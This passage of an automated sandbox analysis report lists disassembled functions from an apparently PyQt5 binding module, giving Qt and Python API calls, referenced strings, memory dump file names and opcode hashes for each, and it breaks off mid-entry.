?clear@?$QVector@VQPointF@@@@QEAAXXZ.QT5CORE ref: 00007FFD86222E7B

Strings

clear, xrefs: 00007FFD86222EAA
clear(self), xrefs: 00007FFD86222E9E
QPolygonF, xrefs: 00007FFD86222EB1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?clear@?$F@@@@PointVector@
String ID: QPolygonF$clear$clear(self)
API String ID: 3433129892-1283402514
Opcode ID: 0f8253b116417c713cc2a04326b685dc2efa2f19505359541c82eebc2d584f72
Instruction ID: bfb674082722d5a9ca6e4d5f3338e31517ebee402da7b24082f2ff783a13a870
Opcode Fuzzy Hash: 0f8253b116417c713cc2a04326b685dc2efa2f19505359541c82eebc2d584f72
Instruction Fuzzy Hash: 53012935B08B4AC1EB009F54E8A96A93374FB44BA4F950032CA0D03330EF7CE94AC340

Function 00007FFD86242E90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFD86242EE0

Strings

QTransform, xrefs: 00007FFD86242F05
m21, xrefs: 00007FFD86242EFE
m21(self) -> float, xrefs: 00007FFD86242EF2

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QTransform$m21$m21(self) -> float
API String ID: 329246742-1934832972
Opcode ID: f3e0f7ceaf558a91ce2eb46d4e7e04869cc0c6dca567a79dbfaa57f503b9ad68
Instruction ID: 7f7db92d04ad97929577fa4b5eba354663bb30c4a95db819370526faa6301699
Opcode Fuzzy Hash: f3e0f7ceaf558a91ce2eb46d4e7e04869cc0c6dca567a79dbfaa57f503b9ad68
Instruction Fuzzy Hash: 06011A31B08A4AC1EB00DF64E8986AD37A8FB447A4F954072CA5C03720DF79D949C340

Function 00007FFD86230AA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

?y@QTextLine@@QEBANXZ.QT5GUI ref: 00007FFD86230AEB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86230AF1

Strings

y(self) -> float, xrefs: 00007FFD86230B03
QTextLine, xrefs: 00007FFD86230B16

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DoubleFloat_FromLine@@Text
String ID: QTextLine$y(self) -> float
API String ID: 1841110782-4236941871
Opcode ID: ae55a666a2f53cadc478b529f1cf320dc1e2607499c8c2c3c3e817c3666b3015
Instruction ID: bdf894569d2835e77d7e8f2a4d2b4832a5ff0b070958f4ac5b00c4b7e50d9c31
Opcode Fuzzy Hash: ae55a666a2f53cadc478b529f1cf320dc1e2607499c8c2c3c3e817c3666b3015
Instruction Fuzzy Hash: 4B01D635B08A4682EB00EF55E8A86AD37A4FB44BA4F954072CA5D43330DF7DEE4AC340

Function 00007FFD862A2DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFD862A2E40

Strings

QTextLength, xrefs: 00007FFD862A2E65
rawValue, xrefs: 00007FFD862A2E5E
rawValue(self) -> float, xrefs: 00007FFD862A2E52

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QTextLength$rawValue$rawValue(self) -> float
API String ID: 329246742-3732438763
Opcode ID: c9d79b5397c8ace420d21827792c9dd46d57e0f96b36de3b750498fc0cb7e774
Instruction ID: 33ef2b34f90ff0601f021b58133c6cb68bdfa62555a74e8ec7adddc5443a0e9a
Opcode Fuzzy Hash: c9d79b5397c8ace420d21827792c9dd46d57e0f96b36de3b750498fc0cb7e774
Instruction Fuzzy Hash: DA011671B08A4AC1EB00DF64E8996A933A4FB44BA4F954072CA5D07320DF79DA8AC780

Function 00007FFD862ACED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?supportedDocumentFormats@QTextDocumentWriter@@SA?AV?$QList@VQByteArray@@@@XZ.QT5GUI ref: 00007FFD862ACF07

Strings

QTextDocumentWriter, xrefs: 00007FFD862ACF46
supportedDocumentFormats, xrefs: 00007FFD862ACF3F
supportedDocumentFormats() -> List[QByteArray], xrefs: 00007FFD862ACF33

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Document$?supportedArray@@@@ByteFormats@List@TextWriter@@malloc
String ID: QTextDocumentWriter$supportedDocumentFormats$supportedDocumentFormats() -> List[QByteArray]
API String ID: 3555204843-2140383059
Opcode ID: 7a61bcd43154609f71648bb6ea5eb05b4ba11299c6eae3938e6137960f5f87bc
Instruction ID: f112503ce924c5aa22b140b79343b17fdf93ff6867deb32e9d30b03b1b4930c3
Opcode Fuzzy Hash: 7a61bcd43154609f71648bb6ea5eb05b4ba11299c6eae3938e6137960f5f87bc
Instruction Fuzzy Hash: 3201FB25B0CA4792EA00AB55F8A97A92360FF85BA5F844076D60D47360DF3CD949C700

Function 00007FFD86230CF0 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FFD86230D36

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFD86230D98
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86230E21
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD86230E3C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Data@@ListVariant@@$?detach@?dispose@Data@1@Data@1@@V0@@malloc
String ID:
API String ID: 3014137604-0
Opcode ID: 15004c50f1e6bf10ec06f0a9e456d6e883a8ceb639857e5bea87b1ff361e2f95
Instruction ID: baa7be58da4f7ca862b22268a34454cf4a7ee3a45c6a373dc2510f986e2a7e2c
Opcode Fuzzy Hash: 15004c50f1e6bf10ec06f0a9e456d6e883a8ceb639857e5bea87b1ff361e2f95
Instruction Fuzzy Hash: 6A417932B05A4586DB14CF18E1A02ADB761FB84FB5F584126DB5E077A8CF39E896C700

Function 00007FFD8626EE00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

J9f, xrefs: 00007FFD8626EE1C
J9J9, xrefs: 00007FFD8626EEB7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: malloc
String ID: J9J9$J9f
API String ID: 2803490479-444492696
Opcode ID: 19f44970d16ff06ae7b93d4552726a8050abe1154deea959a7caf335af0640d7
Instruction ID: 8f35be2e7494a0531250360247da773e8df00f3e5990841a796edb6ebcf10238
Opcode Fuzzy Hash: 19f44970d16ff06ae7b93d4552726a8050abe1154deea959a7caf335af0640d7
Instruction Fuzzy Hash: 7E513D32B1DA4582EB41CF1AE45466DB7A1FB98B94F598231DF4C13764DF38E894CB00

Function 00007FFD862ACA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD862ACB1A

Strings

1J1, xrefs: 00007FFD862ACAB5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: 6358391dddf776b843724f12d947f723dfb47b4e9ef8846a740407a2b17d3c60
Instruction ID: 987dfa2123080627907fa6439d4e58524eccd2a80b7a5dc6924684d799d580b7
Opcode Fuzzy Hash: 6358391dddf776b843724f12d947f723dfb47b4e9ef8846a740407a2b17d3c60
Instruction Fuzzy Hash: E7214176B0DB4282EA518F19F45416D77A4FB84BA1F184172EE4D03B64DF3CE886CB00

Function 00007FFD8624D030 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8624D0DA

Strings

1J1, xrefs: 00007FFD8624D075

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: 2b31a48e3166e4b938b0a2219b906b8613da42e0ae08d0ec284419769cac9cc0
Instruction ID: cdf65ed4051ad8b7cd49f1a00fe8dddc45875316ce79a6d3fa58a874e00ffc09
Opcode Fuzzy Hash: 2b31a48e3166e4b938b0a2219b906b8613da42e0ae08d0ec284419769cac9cc0
Instruction Fuzzy Hash: B9212A76B09B4282EB118F1AF45456D77A5FB88BA0F144172DE4E03B64EF3CE986CB00

Function 00007FFD862B0DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD862B0E7A

Strings

1J1, xrefs: 00007FFD862B0E15

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: 84a59d8a0887306ebc15e4a317a34615b383d4c9677fd128de3dca29286b47d0
Instruction ID: 39a4dfea99ad44d9dd28fde155dbd183cc381d862d756db074f0e50a1a097d3e
Opcode Fuzzy Hash: 84a59d8a0887306ebc15e4a317a34615b383d4c9677fd128de3dca29286b47d0
Instruction Fuzzy Hash: BE212A76B09B4182EA518F1AE45416E77A5FB88BA0F154072DE8D13B64EF3CE886CB00

Function 00007FFD8628AE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8628AEBA

Strings

